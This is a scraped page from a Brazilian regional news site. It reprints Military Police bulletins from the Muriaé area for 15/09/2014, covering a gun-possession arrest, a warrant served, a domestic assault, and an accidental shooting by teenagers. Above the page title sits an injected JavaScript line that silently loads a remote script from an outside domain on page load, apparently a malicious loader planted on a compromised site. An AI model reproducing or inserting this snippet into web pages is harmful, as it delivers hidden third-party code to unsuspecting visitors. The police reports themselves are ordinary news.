;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque-Carangola e Região-15/09/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque-Carangola e Região-15/09/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 15/09/2014

                         76ª CIA PM – MURIAÉ-MG

PM EFETUA PRISÃO POR PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ

Em 13/09/2014, por volta das 20h50min, na Rua Bicas, no Bairro Santa Terezinha, militares abordaram E.P.B. de 18 anos, sendo localizado em sua cintura um revólver cal. 32 oxidado, municiado com 06 cartuchos intactos. Foi dada voz de prisão ao autor e conduzido à DPJ. Lavrado o APF e estipulado a fiança de R$15.000,00, contudo o autor não efetuou o pagamento, permanecendo preso.

PM CUMPRE MANDADO DE PRISÃO EM BARÃO DO MONTE ALTO

Em 12/09/2014, por volta das 23h, na Estrada LMG 615, zona rural de Barão do Monte Alto, militares abordaram o veículo GM ASTRA GL, de UBERLÂNDIA-MG e constaram que este não se encontrava devidamente licenciado, sendo apreendido. Devido denúncias de que um veículo escuro de outro município estava praticando furtos na região, foi realizado consulta dos indivíduos e constatado em desfavor de U.D.G. de 43 anos, um mandado de prisão em aberto, sendo dada a ele voz de prisão e conduzido à DPJ.

PM EFETUA PRISÃO POR LESÃO CORPORAL DE FORAGIDO DA JUSTIÇA EM MURIAÉ

Em 14/09/2014, por volta das 21h57min, na Rua Valdomiro Inácio Rodrigues, no Bairro Aeroporto, A.M.S. de 39 anos, se encontrava com o rosto ensanguentado e com vários cortes pelo mesmo e relatou que ao chegar em casa começou a discutir com L.F.R. de 34 anos, que ficou muito nervoso e começou a agredi-la com um copo causando os ferimentos. Este relatou que estava em casa dormindo quando a reclamante começou a discutir e, neste momento, ele acordou irritado, então começaram as agressões mútuas. Os autores foram assistidos no HSP. Durante consulta no sistema informatizado, constou em desfavor da cidadã envolvida um mandado de prisão em aberto. Foi dada voz de prisão aos autores e conduzidos à DPJ. Prisão de ambos ratificada. 

75ª CIA PM – MURIAÉ-MG

PM EFETUA APREENSÃO DE MENORES ENVOLVIDOS EM LESÃO CORPORAL POR DISPARO DE ARMA DE FOGO EM FERVEDOURO

Em 14/09/2014, por volta das 16h50min, na Avenida José Antônio da Silva Filho, no Centro, em policiamento no DISTRITO DE BOM JESUS DO MADEIRA, militares deslocaram ao hospital onde J.A.L. de 51 anos havia dado entrada vítima de disparo de arma de fogo. Após denúncias, deslocaram até a zona rural de CAPANEMA, onde W.J.S. de 16 anos, disse que parou sua motocicleta às margens da rodovia, pegou o revólver e disparou em direção a uma placa de sinalização e que, após o disparo, observou que havia acertado alguém, então evadiu e pediu a seu amigo, que escondesse a referida arma. Em continuidade, A.N.O. de 17 anos, que estava em companhia do menor acima citado, foi localizado e os militares localizaram o revólver cal.38, com 05 cartuchos intactos e 01 deflagrado e a motocicleta HONDA/CG, MIX, vermelha, foi apreendida. Os autores foram conduzidos à DPJ. A vítima passou por uma intervenção cirúrgica e estava com seu quadro de saúde estável. 

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.